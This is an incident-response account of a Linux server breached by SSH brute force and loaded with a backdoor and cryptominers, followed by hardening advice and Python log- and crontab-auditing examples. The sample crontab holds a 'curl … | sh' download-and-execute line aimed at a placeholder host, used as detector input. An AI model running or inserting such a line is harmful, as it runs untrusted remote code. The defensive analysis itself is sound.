A record of a Linux server intrusion emergency response (summary)

Recently we received a request for help from a customer. The managed telecommunications data center hosting their equipment had notified them that one of their servers had been detected sending attack traffic to external hosts, and they asked us to help troubleshoot the issue.

1. Confirm the security incident

The situation was urgent, and the first thing to do was to confirm that the security incident was genuine. After talking with the server's operations staff, we learned that the service was only meant to be used on the intranet, but the server was in fact exposed to the public Internet: it could be pinged directly from the public network, and SSH port 22 was open. From this alone it was reasonable to assume that the server had been compromised.

2. Log Analysis

We suspected that the attacker had logged into the server by brute-forcing SSH. Checking the logs under /var/log showed that most of the log files had been wiped, but the secure log was intact. It contained a large number of failed SSH logins, with successful root logins recorded after multiple failures, which is the characteristic pattern of a brute-force attack.

Checking the attacking addresses against threat intelligence showed that all of the IP addresses used for the brute-force attempts had a history of malicious scanning.
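The pattern described above (many failed logins, then an accepted root login from the same source) can be pulled out of secure-log lines mechanically. The following is an added example, not a script from the original response; the log lines are constructed in the /var/log/secure format, and the threshold `min_failures` is an assumed tuning value.

```python
import re
from collections import defaultdict

# Constructed sample lines in /var/log/secure format (not from the real incident).
SAMPLE_SECURE_LOG = """\
Mar  3 02:11:01 web01 sshd[2231]: Failed password for root from 203.0.113.45 port 40122 ssh2
Mar  3 02:11:03 web01 sshd[2231]: Failed password for root from 203.0.113.45 port 40122 ssh2
Mar  3 02:11:05 web01 sshd[2233]: Failed password for invalid user admin from 203.0.113.45 port 40130 ssh2
Mar  3 02:11:07 web01 sshd[2235]: Failed password for root from 203.0.113.45 port 40134 ssh2
Mar  3 02:11:09 web01 sshd[2237]: Accepted password for root from 203.0.113.45 port 40140 ssh2
Mar  3 02:15:22 web01 sshd[2301]: Failed password for root from 198.51.100.7 port 51002 ssh2
Mar  3 03:02:10 web01 sshd[2410]: Accepted publickey for deploy from 10.0.0.12 port 55510 ssh2
"""

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"Accepted (?:password|publickey) for (\S+) from (\S+) port")


def find_bruteforce_logins(log_text, min_failures=3):
    """Return {ip: (failures_before_success, user)} for each source IP whose
    successful login came after at least min_failures failed attempts.
    Lines are walked in file order, so only failures *before* the success count."""
    failures = defaultdict(int)
    hits = {}
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            user, ip = m.group(1), m.group(2)
            if failures[ip] >= min_failures and ip not in hits:
                hits[ip] = (failures[ip], user)
    return hits


def attacking_ips(log_text, min_failures=3):
    """Source IPs with at least min_failures failed logins: the list to check
    against threat intelligence, whether or not they eventually got in."""
    failures = defaultdict(int)
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)] += 1
    return sorted(ip for ip, n in failures.items() if n >= min_failures)
```

On a real host, feed it the contents of /var/log/secure (or the rotated copies, since the current file may have been wiped) instead of the sample string.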

3. System Analysis

Check key system configuration, accounts, command history and so on to confirm the impact on the system.

We found that the command history in /root/.bash_history had been cleared; no other abnormalities were found.

4. Process Analysis

Check currently active processes, network connections, startup items, scheduled tasks and so on.

The following issues were found:

1) Abnormal network connection

Checking the system's network connections revealed a Trojan backdoor program named te18 that held a connection to an external host.

Checking the file online confirmed that it was a Linux backdoor program.

2) Abnormal scheduled tasks

Checking the crontab scheduled tasks revealed abnormal entries.

We analyzed the file run by the scheduled task and its startup parameters.

Checking the related files online identified them as cryptomining programs.

We also examined the mining-pool configuration file.

5. Document Analysis

Malicious code and related operational files planted by the attacker were found in the /root directory.

The attacker had created a hidden folder, /root/.s/, to store the mining-related programs.
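The scheduled-task check above and the hidden /root/.s/ folder are two sides of the same finding: a cron entry that runs something out of a hidden or temporary path. The following triage helper is an added example, not part of the original response; the crontab text is constructed in the /var/spool/cron/root format, and the three patterns are assumed heuristics, not a complete signature set.

```python
import re

# Constructed root crontab (not the incident's real /var/spool/cron/root).
SAMPLE_ROOT_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/backup.sh >/dev/null 2>&1
*/5 * * * * /root/.s/run.sh >/dev/null 2>&1
* * * * * curl -fsSL http://example.invalid/x.sh | sh
30 4 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
"""

# A path component that starts with '.', e.g. /root/.s/run.sh
HIDDEN_DIR_RE = re.compile(r"(?:^|/)\.[^/\s]+/")
# Download piped straight into a shell interpreter
DOWNLOAD_EXEC_RE = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")
# Executables living in world-writable temp locations
TEMP_PATH_RE = re.compile(r"(?:^|\s)/(?:tmp|dev/shm|var/tmp)/")


def audit_crontab(text):
    """Return a list of (line_number, reason, line) for entries worth a closer look.
    Only the command field is inspected, so the five schedule fields
    (including '*/5') cannot trigger a false match."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        fields = stripped.split(None, 5)
        # Six fields means "m h dom mon dow command"; anything else
        # (e.g. @reboot lines or environment settings) is scanned whole.
        command = fields[5] if len(fields) == 6 else stripped
        if HIDDEN_DIR_RE.search(command):
            findings.append((n, "runs from a hidden directory", line))
        if DOWNLOAD_EXEC_RE.search(command):
            findings.append((n, "downloads and executes a remote script", line))
        if TEMP_PATH_RE.search(command):
            findings.append((n, "runs from a world-writable temp path", line))
    return findings
```

Run it over every file under /var/spool/cron/ and /etc/cron.d/ as well as /etc/crontab, since persistence is not limited to the root crontab.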

6. Backdoor Investigation

Finally, we used RKHunter to scan the system for backdoors.

7. Conclusion

From the above analysis we can determine that the attacker brute-forced the root user's SSH password, logged into the system, and planted cryptomining programs and a Trojan backdoor.

Hardening suggestions

1) Remove the malicious crontab entries (clear the contents of /var/spool/cron/root) and delete the malicious files the attacker planted on the server.

2) Change the passwords of all system users and enforce password complexity: more than 8 characters, mixing uppercase and lowercase letters, digits and special symbols;

3) Unless it is necessary, do not expose the SSH port to the external network; otherwise change the default SSH port and restrict the source IPs allowed to connect;
